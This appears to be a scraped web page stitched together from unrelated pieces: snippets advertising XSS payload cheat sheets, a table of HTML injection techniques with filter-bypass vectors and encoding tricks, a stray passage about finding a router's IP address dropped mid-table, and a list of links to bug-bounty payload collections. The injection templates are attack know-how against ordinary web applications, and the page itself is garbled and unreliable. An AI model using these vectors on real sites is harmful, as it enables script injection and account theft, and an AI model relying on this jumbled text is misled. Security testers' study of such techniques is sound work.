This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. XSS Payload Cheat Sheet. Contribute to rootbakar/XSS-Payload development by creating an account on GitHub. XSSCheatSheet2020Edition 简介. 白帽赏金平台xss漏洞模糊测试有效载荷的最佳集合 2020版 该备忘清单可用于漏洞猎人,安全分析,渗透测试人员,根据应用的实际情况,测试不同的payload,并观察响应内容,查找web应用的跨站点脚本漏洞,共计100+条xss漏洞测试小技巧.

  1. Xss Payload Cheat Sheet 2020

The Book takes care to explain the elevation of Cross-Site Scripting (XSS) to the title of HTML Injection. This quick reference describes some of the common techniques used to inject a payload into a web application.

In the examples below the biohazard symbol (U+2623), ☣, represents an executable JavaScript payload. It could be anything from a while loop to lock the browser, e.g. while(1){a=1;}, or something more useful that a creative attacker comes up with. You can quite easily find “XSS Cheat Sheets” elsewhere. The intent of this reference is to instill a sense of methodology into finding HTML injection vulnerabilities. Good exploits take advantage of HTML syntax and browser quirks in creative ways. Take the time to experiment with simple payloads and observe how (and where) the web application reflects them. Then turn towards the list of complex attacks on a cheat sheet.

Xss payload cheat sheet 2020

Also notice how the syntax of elements and JavaScript have been preserved in cases where single- or double-quotes are used to prefix a payload. The injected quote prematurely ends a quoted string, which means there will be a dangling quote at the end. Whether the reflection point is in an intrinsic event or a JavaScript block, the dangling quote is trivially consumed by throwing an extra variable definition with an open quote:

;a='

The dangling quote will close the delimiter and, in most cases, the syntax will be preserved. This type of closure isn’t really necessary for an exploit to work, but it’s a sign craftier exploits.

The table’s layout is a bit constrained by the format of this post. Keep an eye on it for updates to content as well as presentation.

table { border-collapse: collapse; border: solid }thead { border: solid medium; text-align: center; }td { border: solid thin; text-align: center; padding: 2px; }.leftText { text-align: left }

TechniqueCharactersPayload ExampleInjection Example
Close a start tag in order to insert a new element

(This usually happens within an element attribute, but keep in mind HTML comments and XML CDATA.)

>
/>
–>
]]>
><script>☣<script><input type=text name=id value=
><script>☣<script>

>
Insert an end tag in order to insert a new element

(Also useful where XML appears, such as RSS feeds.)

</element>
]]>
]]><script>☣<script><INFO><![CDATA[
]]><script>☣</script>
Close a quoted attribute in order to insert an intrinsic event” (ASCII 0x22)
‘ (ASCII 0x27)
“onEvent=☣;a=”<a href=”/redir?url=http://&#8221; onClick=☣;a=”“>
Break out of a JavaScript variable” (ASCII 0x22)
‘ (ASCII 0x27)
“;{☣}var foo=”<script>
var host = window.location;
var lastLink = “http://web.site/index?refurl=“;{☣}var foo=”“;

<script>
Split payload across multiple reflection points

(Also a good way to bypass filters. Use HTML comment delimiters to elide content between the two payloads. In some cases you might be able to use quoted strings to elide content.)

(as above)1: “<script<!–

2: –>>☣</script>

<input value=”“<script<!– “>other content <input value=” –>>☣</script>
Alter MIME interpretation of uploaded file

(Usually when content is expected to be served as text/plain, binary, or other non-HTML type)

May 04, 2021 If you’re using Windows, you can find your router’s IP address by using the Command Prompt app or the Control Panel. From the Command Prompt app, type ipconfig, hit Enter, and your system will bring up your default gateway or IP address. In Control Panel, go to Network and internet View network status and tasks Ethernet Details. Router Dec 02, 2020 The easiest way is through System Preferences. Click Network, choose the network connection you're using, then click Advanced. Click the TCP/IP tab and locate the IP address next to Router. Another way is to use the netstat command. To find your modem’s IP address on Windows computers; Click the Windows Start button, type 'cmd' in the Search box and press 'Enter' to open the Command Prompt. Type 'ipconfig /all' in the Command Prompt and press 'Enter' to run the command. Jul 03, 2017 Find Your Router’s IP Address on the iPhone and iPad On an iPhone or iPad, just head to Settings Wi-Fi, and then tap the name of your Wi-Fi network. You’ll see the router’s IP address listed as “Router”. Find Your Router’s IP Address in Android.

Must be able to influence Content-Type header or browser’s MIME sniffing algorithmtext/html

application/x-javascript

Uploaded file contains JavaScript.
Image EXIF data contains HTML & JavaScript.
Bypass a filter using browser quirkAlternate whitespace character

Non-standard element or attribute

See http://x86.cx/html5/ for an example of a complex src attribute for an img element.
Bypass a filter using alternate or invalid character encoding

(The goal is to find a sequence that disrupts or confuses a parser enough that a character such as ASCII 0x22 is considered part of a multibyte sequence, but is served to the browser as a single-byte character. This would either occur because a server-side filter incorrectly stripped or rewrote the invalid sequence or the browser’s character parser misinterpreted the sequence.)

UTF-7
UTF-8
Unicode
%fe%22
%fd%22
%cd%22
%c1%22
%c0%a2
%80%22
%22
JavaScript execution in CSS and style definitions

[Obsolete for modern browsers due to security concerns]

IE Expressions
Mozilla -moz-binding
🔥Complete Bug Bounty Cheat Sheet🔥
🔥Complete Bug Bounty Cheat Sheet🔥
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
SSRF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
CRLF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
CSV-Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection
Command Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Directory Traversal
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
LFI
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
XXE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md
Open-Redirect
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md
RCE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md
Crypto
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md
Template Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
XSLT
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md
Content Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md
LDAP Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
NoSQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
CSRF Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection
GraphQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
IDOR
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References
ISCM
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management
LaTex Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
OAuth
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth
XPATH Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
Bypass Upload Tricky
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
BURP
https://drive.google.com/file/d/1r1LGt7fEh8AuhihrBfp1GGmU9ttV9CkP/view?usp=sharing
https://drive.google.com/file/d/1IOgrVUIQb9HGQG9tePe3v_w2gyaymUFq/view?usp=sharing
Xss script list

Xss Payload Cheat Sheet 2020

Sign up for freeto join this conversation on GitHub. Already have an account? Sign in to comment